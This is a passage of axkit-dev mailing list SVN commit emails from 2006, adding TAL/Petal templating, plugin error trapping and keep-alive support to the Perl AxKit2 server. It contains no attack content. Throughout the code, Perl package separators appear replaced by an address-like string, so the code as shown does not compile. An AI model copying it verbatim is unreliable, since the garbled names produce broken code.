tests=DNS_FROM_RFC_BOGUSMX,NO_REAL_NAME X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO bodger.sergeant.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Mon, 31 Jul 2006 14:18:43 -0700 Received: (qmail 32521 invoked by uid 510); 31 Jul 2006 21:17:41 -0000 Received: from msergeant.messagelabs.net (HELO localhost.localdomain) (161.129.204.104) by bodger.sergeant.org (qpsmtpd/0.28) with ESMTP; Mon, 31 Jul 2006 21:17:41 +0000 MIME-Version: 1.0 From: [email protected] Errors-To: [email protected] To: [email protected] Subject: [SVN] [20] Support for TAL (aka Petal) X-Mailer: SVNacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bNotify 2.62: http://search.cpan.org/dist/SVN-Notify/ Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Old-Spam-Status: unknown Message-Id: <[email protected]> Date: Mon, 31 Jul 2006 14:18:45 -0700 (PDT) X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Revision: 20 Author: matt Date: 2006-07-31 21:07:03 +0000 (Mon, 31 Jul 2006) Log Message: ----------- Support for TAL (aka Petal) Modified Paths: -------------- trunk/etc/axkit.conf trunk/lib/AxKit2/Processor.pm Added Paths: ----------- trunk/demo/tal/ trunk/demo/tal/index.xml trunk/demo/tal/tal.html trunk/demo/xsp/ trunk/demo/xsp/test.xsp trunk/lib/AxKit2/Transformer/TAL.pm trunk/plugins/demo/ trunk/plugins/demo/serve_tal Removed Paths: ------------- trunk/demo/test.xsp Added: trunk/demo/tal/index.xml =================================================================== --- trunk/demo/tal/index.xml 2006-07-29 02:34:31 UTC (rev 19) +++ trunk/demo/tal/index.xml 2006-07-31 21:07:03 UTC (rev 20) @@ -0,0 +1,21 @@ +<?xml version="1.0"?> +<demo> + <title>This is the title</title> + <users> + <user> + <first>Larry</first> + <last>Wall</last> + </user> + <user> + <first>Audrey</first> + <last>Tang</last> + </user> + <user> + <first>chromatic</first> + </user> + <user> + <first>Matt</first> + <last>Sergeant</last> + </user> + </users> +</demo> \ No newline at end of file Added: trunk/demo/tal/tal.html =================================================================== --- trunk/demo/tal/tal.html 2006-07-29 02:34:31 UTC (rev 19) +++ trunk/demo/tal/tal.html 2006-07-31 21:07:03 UTC (rev 20) @@ -0,0 +1,15 @@ +<?xml version="1.0"?> +<html + xmlns:tal="http://xml.zope.org/namespaces/tal"> + <head> + <title tal:content="/demo/title">TITLE</title> + </head> + <body> + <h1>Petal Demo</h1> + <ul> + <li tal:repeat="u /demo/users/user"> + <span tal:replace="$u/last">last</span>, <span tal:replace="$u/first">first</span> + </li> + </ul> + </body> +</html> \ No newline at end of file Deleted: trunk/demo/test.xsp =================================================================== --- trunk/demo/test.xsp 2006-07-29 02:34:31 UTC (rev 19) +++ trunk/demo/test.xsp 2006-07-31 21:07:03 UTC (rev 20) @@ -1,7 +0,0 @@ -<?xml version="1.0"?> -<xsp:page xmlns:xsp="http://apache.org/xsp/core/v1"> - <output> - Hello World. The time of request is: - <xsp:expr>scalar localtime</xsp:expr> - </output> -</xsp:page> Copied: trunk/demo/xsp/test.xsp (from rev 18, trunk/demo/test.xsp) Modified: trunk/etc/axkit.conf =================================================================== --- trunk/etc/axkit.conf 2006-07-29 02:34:31 UTC (rev 19) +++ trunk/etc/axkit.conf 2006-07-31 21:07:03 UTC (rev 20) @@ -37,4 +37,9 @@ XSP_Match .*\.xsp </Location> + <Location /tal> + DocumentRoot /Users/matt/Perl/AxKit2/trunk/demo/tal + Plugin demo/serve_tal + </Location> + </Server> Modified: trunk/lib/AxKit2/Processor.pm =================================================================== --- trunk/lib/AxKit2/Processor.pm 2006-07-29 02:34:31 UTC (rev 19) +++ trunk/lib/AxKit2/Processor.pm 2006-07-31 21:07:03 UTC (rev 20) @@ -6,11 +6,12 @@ use Exporter (); our @ISA = qw(Exporter); -our @EXPORT = qw(XSP XSLT Output Render); +our @EXPORT = qw(XSP XSLT TAL Output Render); use XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML; use AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTransformeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bXSP; use AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTransformeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bXSLT; +use AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTransformeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTAL; our $parser = XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML->new(); @@ -76,7 +77,7 @@ sub str_to_transform { my $str = shift; ref($str) and return $str; - if ($str =~ /^(XSP|XSLT)\((.*)\)/) { + if ($str =~ /^(TAL|XSP|XSLT)\((.*)\)/) { return $1->($2); } else { @@ -108,6 +109,11 @@ return AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTransformeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bXSLT->new($stylesheet); } +sub TAL { + my $stylesheet = shift || die "TAL requires a stylesheet"; + return AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTransformeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTAL->new($stylesheet); +} + sub Output { } Added: trunk/lib/AxKit2/Transformer/TAL.pm =================================================================== --- trunk/lib/AxKit2/Transformer/TAL.pm 2006-07-29 02:34:31 UTC (rev 19) +++ trunk/lib/AxKit2/Transformer/TAL.pm 2006-07-31 21:07:03 UTC (rev 20) @@ -0,0 +1,335 @@ +package AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTransformeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTAL; + +use strict; +use warnings; + +use base qw(AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTransformeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bXSLT); + +my $parser = XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML->new(); +my $xslt = XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXSLT->new(); +my $tal2xsl = $xslt->parse_stylesheet($parser->parse_fh(\*DATA)); + +my %cache; +sub transform { + my $self = shift; + my ($pos, $processor) = @_; + + my $dom = $processor->dom; + + my $stylefile = $self->{stylesheet}; + + my $stylesheet = $cache{$stylefile}; + if (!$stylesheet) { + my $style_doc = $parser->parse_file($stylefile); + my $xslt_dom = $tal2xsl->transform($style_doc); + $stylesheet = $xslt->parse_stylesheet($xslt_dom); + + $cache{$stylefile} = $stylesheet; + } + + my $results = $stylesheet->transform($dom); + + return $results, sub { $self->output(@_) }; +} + +sub output { + my ($self, $client, $dom) = @_; + + my ($out, $ct); + if (lc($dom->documentElement->nodeName) eq 'html') { + $out = $dom->toStringHTML(); + $ct = "text/html"; + } + else { + $out = $dom->toStringHTML(); + $ct = "application/xml"; + } + my $enc = "UTF-8"; + + $client->headers_out->header('Content-Length', length($out)); + $client->headers_out->header('Content-Type', "$ct; charset=$enc"); + $client->send_http_headers; + $client->write($out); +} + +1; + +__DATA__ +<?xml version="1.0"?> + +<!-- + Copyright 2004-2005 Bitflux GmbH + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. + + $Id: popoon.php 4323 2005-05-25 17:45:38Z chregu + +--> + +<xsl:stylesheet version="1.0" + xmlns:metal="http://xml.zope.org/namespaces/metal" + xmlns:bxf="http://bitflux.org/functions" + xmlns:tal="http://xml.zope.org/namespaces/tal" + xmlns:xsl="http://www.w3.org/1999/XSL/Transform" + xmlns:xslout="whatever" + xmlns:func="http://exslt.org/functions" + extension-element-prefixes="func"> + + <xsl:namespace-alias stylesheet-prefix="xslout" result-prefix="xsl"/> + <func:function name="bxf:tales"> + <xsl:param name="path"/> + <xsl:choose> + <xsl:when test="$path = ''"> + <func:result select="'node()'"/> + </xsl:when> + <xsl:otherwise> + <func:result select="$path"/> + </xsl:otherwise> + </xsl:choose> + </func:function> + <xsl:template match="/"> + <xslout:stylesheet version="1.0" exclude-result-prefixes="bxf tal metal"> + <xsl:choose> + <xsl:when test="local-name(/node()) = 'html'"> + <xslout:output encoding="utf-8" method="xml" doctype-public="-//W3C//DTD XHTML 1.0 Transitional//EN" doctype-system="http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"/> + </xsl:when> + <xsl:otherwise> + <xslout:output encoding="utf-8" method="xml"/> + </xsl:otherwise> + </xsl:choose> + <xsl:apply-templates select="//*[@tal:include]" mode="init"/> + <xsl:apply-templates select="//*[@tal:match]" mode="init"/> + <xsl:apply-templates select="//*[@metal:use-macro]" mode="init"/> + <xslout:template match="/"> + + <xsl:apply-templates/> + </xslout:template> + <!--copy all elements --> + <xslout:template match="*"> + <xslout:copy> + <xslout:apply-templates select="@*"/> + <xslout:apply-templates/> + </xslout:copy> + </xslout:template> + <!-- copy all attributes --> + <xslout:template match="@*"> + <xslout:copy-of select="."/> + </xslout:template> + </xslout:stylesheet> + + </xsl:template> + + + <xsl:template match="*[@tal:condition]" priority="10"> + <xslout:if test="{bxf:tales(@tal:condition)}"> + <xsl:apply-templates/> + </xslout:if> + </xsl:template> + + <xsl:template match="*[@metal:use-macro]"> + <xsl:variable name="doc" select="substring-before(@metal:use-macro,'#')"/> + <xsl:variable name="path" select="substring-after(@metal:use-macro,'#')"/> + <xsl:apply-templates select="document($doc)//*[@metal:define-macro = $path]"/> + </xsl:template> + + <xsl:template match="*[@metal:use-macro]" mode="init"> + <xsl:variable name="doc" select="substring-before(@metal:use-macro,'#')"/> + <xsl:variable name="path" select="substring-after(@metal:use-macro,'#')"/> + <xsl:apply-templates select="document($doc)//*[@metal:define-macro = $path]" mode="init"/> + </xsl:template> + + <xsl:template match="text()" mode ="init"> + <xsl:if test="ancestoracf:4db6:5e0b:f386:43a5:35d7:718d:3c8b*[@tal:match]"> + <xsl:copy/> + </xsl:if> + </xsl:template> + + + + <xsl:template match="@metal:define-macro"> + </xsl:template> + <xsl:template match="*[@tal:content]" name="tal_content"> + <xsl:copy> + <xsl:apply-templates select="@*"/> + <xsl:call-template name="copy-value-apply"> + <xsl:with-param name="path" select="@tal:content"/> + </xsl:call-template> + </xsl:copy> + </xsl:template> + + + <xsl:template match="*[@tal:replace]"> + <xsl:call-template name="copy-value-apply"> + <xsl:with-param name="path" select="@tal:replace"/> + </xsl:call-template> + </xsl:template> + + + <xsl:template match="*[@tal:repeat]"> + <xsl:variable name="v" select="substring-before(@tal:repeat,' ')"/> + <xsl:variable name="x" select="substring-after(@tal:repeat,' ')"/> + <xslout:for-each select="{bxf:tales($x)}"> + <xslout:variable name="{$v}" select="."/> + <xsl:copy> + <xsl:apply-templates select="@*"/> + <xsl:apply-templates/> + </xsl:copy> + </xslout:for-each> + </xsl:template> + + <!-- special case of above if tal:repeat and tal:content are in the same element --> + <xsl:template match="*[@tal:repeat and @tal:content]"> + <xsl:variable name="v" select="substring-before(@tal:repeat,' ')"/> + <xsl:variable name="x" select="substring-after(@tal:repeat,' ')"/> + <xslout:for-each select="{bxf:tales($x)}"> + <xslout:variable name="{$v}" select="."/> + <xsl:call-template name="tal_content"/> + </xslout:for-each> + </xsl:template> + + + <xsl:template match="@*"> + <xsl:if test="namespace-uri() != 'http://xml.zope.org/namespaces/tal'"> + <xsl:copy-of select="."/> + </xsl:if> + </xsl:template> + + <xsl:template match="*[@tal:match]"/> + + <xsl:template match="*[@tal:include]" mode="init"> + <xsl:call-template name="talIncludes"> + <xsl:with-param name="include" select="@tal:include"/> + </xsl:call-template> + </xsl:template> + + <xsl:template name="talIncludes"> + <xsl:param name="include"/> + <xsl:choose> + <xsl:when test="contains($include,' ')"> + <xslout:include href="{substring-before($include,' ')}"/> + <xsl:call-template name="talIncludes"> + <xsl:with-param name="include" select="substring-after($include,' ')"/> + </xsl:call-template> + </xsl:when> + <xsl:otherwise> + <xslout:include href="{$include}"/> + </xsl:otherwise> + </xsl:choose> + </xsl:template> + + <xsl:template match="*[@tal:match]" mode="init"> + <xslout:template match="{@tal:match}"> + <xsl:apply-templates/> + </xslout:template> + </xsl:template> + + + <!-- outputs value-of, copy-of our apply-templates of $path depending on the first param + "/foo/bar" -> <xsl:value-of select="/foo/bar"/> + "text /foo/bar" -> <xsl:value-of select="/foo/bar"/> + "structure /foo/bar" -> <xsl:copy-of select="/foo/bar"/> + --> + <xsl:template name="copy-value-apply"> + <xsl:param name="path"/> + <xsl:variable name="mode"> + <xsl:value-of select="substring-before($path,' ')"/> + </xsl:variable> + <xsl:variable name="spath"> + <xsl:value-of select="substring-after($path,' ')"/> + </xsl:variable> + + <xsl:choose> + <!-- if no mode, use value-of --> + <xsl:when test="$path ='structure'"> + <xslout:apply-templates select="{bxf:tales('')}"/> + </xsl:when> + <xsl:when test="$mode = ''"> + <xslout:value-of select="{bxf:tales($path)}"/> + </xsl:when> + <xsl:when test="$mode = 'text'"> + <xslout:value-of select="{bxf:tales($spath)}"/> + </xsl:when> + <xsl:when test="$mode = 'text-escaped'"> + <xslout:value-of select="{bxf:tales($spath)}" disable-output-escaping="yes"/> + </xsl:when> + <xsl:when test="$path = 'structure .'"> + <xslout:copy> + <xslout:apply-templates select="@*"/> + <xslout:apply-templates select="{bxf:tales('')}"/> + </xslout:copy> + </xsl:when> + <xsl:when test="$mode = 'structure'"> + <xslout:apply-templates select="{bxf:tales($spath)}"/> + </xsl:when> + </xsl:choose> + </xsl:template> + + + <xsl:template match="@tal:attributes"> + <xsl:call-template name="talAttribute"> + <xsl:with-param name="attr" select="."/> + </xsl:call-template> + </xsl:template> + + <xsl:template name="talAttribute"> + <xsl:param name="attr"/> + <xsl:choose> + <xsl:when test="contains($attr,'; ')"> + + <xsl:call-template name="talAttribute"> + <xsl:with-param name="attr" select="substring-after($attr,'; ')"/> + </xsl:call-template> + <xsl:call-template name="outputTalAttribute"> + <xsl:with-param name="attr" select="substring-before($attr,'; ')"/> + </xsl:call-template> + </xsl:when> + + <xsl:otherwise> + <xsl:call-template name="outputTalAttribute"> + <xsl:with-param name="attr" select="$attr"/> + </xsl:call-template> + </xsl:otherwise> + </xsl:choose> + </xsl:template> + + <xsl:template name="outputTalAttribute"> + <xsl:param name="attr"/> + <xsl:variable name="name" select="substring-before($attr,' ')"/> + <xsl:variable name="value" select="substring-after($attr,' ')"/> + <xslout:attribute name="{$name}"> + <xslout:value-of select="{bxf:tales($value)}"/> + </xslout:attribute> + + </xsl:template> + + <xsl:template match="*"> + <xsl:copy> + <xsl:apply-templates select="@*"/> + <xsl:apply-templates/> + </xsl:copy> + </xsl:template> + + + <xsl:template match="comment()"> + <xslout:comment> + <xsl:value-of select="."/> + </xslout:comment> + </xsl:template> + + + <xsl:template match="processing-instruction()"> + <xslout:processing-instruction name="{name()}"> + <xsl:value-of select="."/> + </xslout:processing-instruction> + </xsl:template> +</xsl:stylesheet> Added: trunk/plugins/demo/serve_tal =================================================================== --- trunk/plugins/demo/serve_tal 2006-07-29 02:34:31 UTC (rev 19) +++ trunk/plugins/demo/serve_tal 2006-07-31 21:07:03 UTC (rev 20) @@ -0,0 +1,14 @@ +#!/usr/bin/perl -w + +sub hook_xmlresponse { + my ($self, $input) = @_; + + $self->log(LOGDEBUG, "TAL Transform"); + + my $stylefile = $self->client->headers_in->filename; + $stylefile =~ s/\/[^\/]*$/\/tal.html/; + + my $out = $input->transform(TAL($stylefile)); + + return OK, $out; +} \ No newline at end of file From [email protected] Mon Jul 31 21:19:54 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47236 invoked from network); 31 Jul 2006 21:19:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 Jul 2006 21:19:53 -0000 Received: (qmail 23144 invoked by uid 500); 31 Jul 2006 21:19:53 -0000 Delivered-To: [email protected] Received: (qmail 23090 invoked by uid 500); 31 Jul 2006 21:19:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <axkit-dev.xml.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 23079 invoked by uid 99); 31 Jul 2006 21:19:53 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 31 Jul 2006 14:19:52 -0700 X-ASF-Spam-Status: No, hits=2.6 required=10.0 tests=DNS_FROM_RFC_BOGUSMX,NO_REAL_NAME X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO bodger.sergeant.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Mon, 31 Jul 2006 14:19:52 -0700 Received: (qmail 516 invoked by uid 510); 31 Jul 2006 21:19:37 -0000 Received: from msergeant.messagelabs.net (HELO localhost.localdomain) (161.129.204.104) by bodger.sergeant.org (qpsmtpd/0.28) with ESMTP; Mon, 31 Jul 2006 21:19:37 +0000 MIME-Version: 1.0 From: [email protected] Errors-To: [email protected] To: [email protected] Subject: [SVN] [21] One down :-) X-Mailer: SVNacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bNotify 2.62: http://search.cpan.org/dist/SVN-Notify/ Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Old-Spam-Status: unknown Message-Id: <[email protected]> Date: Mon, 31 Jul 2006 14:19:52 -0700 (PDT) X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Revision: 21 Author: matt Date: 2006-07-31 21:19:35 +0000 (Mon, 31 Jul 2006) Log Message: ----------- One down :-) Modified Paths: -------------- trunk/TODO.txt Modified: trunk/TODO.txt =================================================================== --- trunk/TODO.txt 2006-07-31 21:07:03 UTC (rev 20) +++ trunk/TODO.txt 2006-07-31 21:19:35 UTC (rev 21) @@ -28,5 +28,3 @@ - Support HTMLDoc. - Support PassiveTeX. - -- Support Petal. From [email protected] Mon Jul 31 21:24:12 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 48485 invoked from network); 31 Jul 2006 21:24:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 Jul 2006 21:24:12 -0000 Received: (qmail 27909 invoked by uid 500); 31 Jul 2006 21:24:12 -0000 Delivered-To: [email protected] Received: (qmail 27855 invoked by uid 500); 31 Jul 2006 21:24:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <axkit-dev.xml.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 27844 invoked by uid 99); 31 Jul 2006 21:24:12 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 31 Jul 2006 14:24:12 -0700 X-ASF-Spam-Status: No, hits=2.6 required=10.0 tests=DNS_FROM_RFC_BOGUSMX,NO_REAL_NAME X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO bodger.sergeant.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Mon, 31 Jul 2006 14:24:11 -0700 Received: (qmail 1104 invoked by uid 510); 31 Jul 2006 21:23:57 -0000 Received: from msergeant.messagelabs.net (HELO localhost.localdomain) (161.129.204.104) by bodger.sergeant.org (qpsmtpd/0.28) with ESMTP; Mon, 31 Jul 2006 21:23:56 +0000 MIME-Version: 1.0 From: [email protected] Errors-To: [email protected] To: [email protected] Subject: [SVN] [22] Prevent a plugin failure taking down the server X-Mailer: SVNacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bNotify 2.62: http://search.cpan.org/dist/SVN-Notify/ Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Old-Spam-Status: unknown Message-Id: <[email protected]> Date: Mon, 31 Jul 2006 14:24:11 -0700 (PDT) X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Revision: 22 Author: matt Date: 2006-07-31 21:23:52 +0000 (Mon, 31 Jul 2006) Log Message: ----------- Prevent a plugin failure taking down the server Modified Paths: -------------- trunk/lib/AxKit2/Client.pm Modified: trunk/lib/AxKit2/Client.pm =================================================================== --- trunk/lib/AxKit2/Client.pm 2006-07-31 21:19:35 UTC (rev 21) +++ trunk/lib/AxKit2/Client.pm 2006-07-31 21:23:52 UTC (rev 22) @@ -67,7 +67,8 @@ for my $plugin ($conf->plugins) { my $plug = plugin_instance($plugin) || next; for my $h ($plug->hooks($hook)) { - @r = $plug->$h($self, $conf, @_); + eval { @r = $plug->$h($self, $conf, @_) }; + $@ and $self->log(LOGERROR, "FATAL PLUGIN ERROR: $@"); next unless @r; last MAINLOOP unless $r[0] == DECLINED; } From [email protected] Mon Jul 31 21:24:44 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 48623 invoked from network); 31 Jul 2006 21:24:44 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 Jul 2006 21:24:44 -0000 Received: (qmail 28115 invoked by uid 500); 31 Jul 2006 21:24:44 -0000 Delivered-To: [email protected] Received: (qmail 28101 invoked by uid 500); 31 Jul 2006 21:24:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <axkit-dev.xml.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 28090 invoked by uid 99); 31 Jul 2006 21:24:44 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 31 Jul 2006 14:24:44 -0700 X-ASF-Spam-Status: No, hits=2.6 required=10.0 tests=DNS_FROM_RFC_BOGUSMX,NO_REAL_NAME X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO bodger.sergeant.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Mon, 31 Jul 2006 14:24:43 -0700 Received: (qmail 1198 invoked by uid 510); 31 Jul 2006 21:24:29 -0000 Received: from msergeant.messagelabs.net (HELO localhost.localdomain) (161.129.204.104) by bodger.sergeant.org (qpsmtpd/0.28) with ESMTP; Mon, 31 Jul 2006 21:24:29 +0000 MIME-Version: 1.0 From: [email protected] Errors-To: [email protected] To: [email protected] Subject: [SVN] [23] One more item complete X-Mailer: SVNacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bNotify 2.62: http://search.cpan.org/dist/SVN-Notify/ Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Old-Spam-Status: unknown Message-Id: <[email protected]> Date: Mon, 31 Jul 2006 14:24:44 -0700 (PDT) X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Revision: 23 Author: matt Date: 2006-07-31 21:24:27 +0000 (Mon, 31 Jul 2006) Log Message: ----------- One more item complete Modified Paths: -------------- trunk/TODO.txt Modified: trunk/TODO.txt =================================================================== --- trunk/TODO.txt 2006-07-31 21:23:52 UTC (rev 22) +++ trunk/TODO.txt 2006-07-31 21:24:27 UTC (rev 23) @@ -3,8 +3,6 @@ - Implement Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest-a-like and figure out how to past to Transformers -- eval calls to plugins so their death doesn't take down the server - - Add logging everywhere at reasonable levels - Implement better output of HTTP headers. Particularly caching headers (ETags etc). From [email protected] Tue Aug 01 03:12:42 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 43353 invoked from network); 1 Aug 2006 03:12:42 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Aug 2006 03:12:42 -0000 Received: (qmail 44927 invoked by uid 500); 1 Aug 2006 03:12:42 -0000 Delivered-To: [email protected] Received: (qmail 44912 invoked by uid 500); 1 Aug 2006 03:12:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <axkit-dev.xml.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 44901 invoked by uid 99); 1 Aug 2006 03:12:42 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 31 Jul 2006 20:12:42 -0700 X-ASF-Spam-Status: No, hits=2.6 required=10.0 tests=DNS_FROM_RFC_BOGUSMX,NO_REAL_NAME X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO bodger.sergeant.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Mon, 31 Jul 2006 20:12:41 -0700 Received: (qmail 12217 invoked by uid 510); 1 Aug 2006 03:12:20 -0000 Received: from msergeant.messagelabs.net (HELO localhost.localdomain) (161.129.204.104) by bodger.sergeant.org (qpsmtpd/0.28) with ESMTP; Tue, 01 Aug 2006 03:12:20 +0000 MIME-Version: 1.0 From: [email protected] Errors-To: [email protected] To: [email protected] Subject: [SVN] [24] Support connection notes fields X-Mailer: SVNacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bNotify 2.62: http://search.cpan.org/dist/SVN-Notify/ Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Old-Spam-Status: unknown Message-Id: <[email protected]> Date: Mon, 31 Jul 2006 20:12:41 -0700 (PDT) X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Revision: 24 Author: matt Date: 2006-08-01 03:12:17 +0000 (Tue, 01 Aug 2006) Log Message: ----------- Support connection notes fields Support POST/PUT data via body_data callbacks Support potential for persistent (keep-alive) connections Modified Paths: -------------- trunk/lib/AxKit2/Client.pm trunk/lib/AxKit2/Connection.pm trunk/lib/AxKit2/Plugin.pm Modified: trunk/lib/AxKit2/Client.pm =================================================================== --- trunk/lib/AxKit2/Client.pm 2006-07-31 21:24:27 UTC (rev 23) +++ trunk/lib/AxKit2/Client.pm 2006-08-01 03:12:17 UTC (rev 24) @@ -143,4 +143,19 @@ } } +sub hook_body_data { + my $self = shift; + my ($ret, $out) = $self->run_hooks('body_data', @_); + if ($ret == DECLINED) { + $self->process_request(); + return; + } + elsif ($ret == OK) { + return 1; + } + else { + # TODO: output error stuff? + } +} + 1; \ No newline at end of file Modified: trunk/lib/AxKit2/Connection.pm =================================================================== --- trunk/lib/AxKit2/Connection.pm 2006-07-31 21:24:27 UTC (rev 23) +++ trunk/lib/AxKit2/Connection.pm 2006-08-01 03:12:17 UTC (rev 24) @@ -18,6 +18,7 @@ ditch_leading_rn server_config http_headers_sent + notes ); use constant CLEANUP_TIME => 5; # every N seconds @@ -41,6 +42,7 @@ $self->{headers_string} = ''; $self->{ditch_leading_rn} = 0; # TODO - work out how to set that... $self->{server_config} = $servconf; + $self->{notes} = {}; $self->log(LOGINFO, "Connection from " . $self->peer_addr_string); # allow connect hook to disconnect us @@ -57,6 +59,13 @@ return $self->{server_config}; } +sub notes { + my AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bConnection $self = shift; + my $key = shift; + @_ and $self->{notes}->{$key} = shift; + $self->{notes}->{$key}; +} + sub max_idle_time { 30 } sub max_connect_time { 180 } sub event_err { my AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bConnection $self = shift; $self->close("Error") } @@ -64,6 +73,14 @@ sub event_read { my AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bConnection $self = shift; + $self->{alive_time} = time; + + if ($self->{headers_in}) { + # already got the headers... do we get a body too? + my $bref = $self->read(8192); + return $self->close($!) unless defined $bref; + return $self->hook_body_data($bref); + } my $to_read = MAX_HTTP_HEADER_LENGTH - length($self->{headers_string}); my $bref = $self->read($to_read); return $self->close($!) unless defined $bref; @@ -108,7 +125,7 @@ $self->{ditch_leading_rn} = 0; - $self->process_request(); + $self->process_request() if $self->{headers_in}->request_method =~ /GET|HEAD/; } sub headers_out { @@ -151,9 +168,58 @@ $self->hook_xmlresponse(AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bProcessor->new($hd->filename)) || $self->hook_response($hd); - $self->close(); + $self->http_response_sent(); } +# called when we've finished writing everything to a client and we need +# to reset our state for another request. returns 1 to mean that we should +# support persistence, 0 means we're discarding this connection. +sub http_response_sent { + my AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bConnection $self = $_[0]; + + # close if we're supposed to + if ( + ! defined $self->{headers_out} || + ! $self->{headers_out}->res_keep_alive($self->{headers_in}) + ) + { + # do a final read so we don't have unread_data_waiting and RST + # the connection. IE and others send an extra \r\n after POSTs + my $dummy = $self->read(5); + + # close if we have no response headers or they say to close + $self->close("no_keep_alive"); + return 0; + } + + # if they just did a POST, set the flag that says we might expect + # an unadvertised \r\n coming from some browsers. Old Netscape + # 4.x did this on all POSTs, and Firefox/Safari do it on + # XmlHttpRequest POSTs. + if 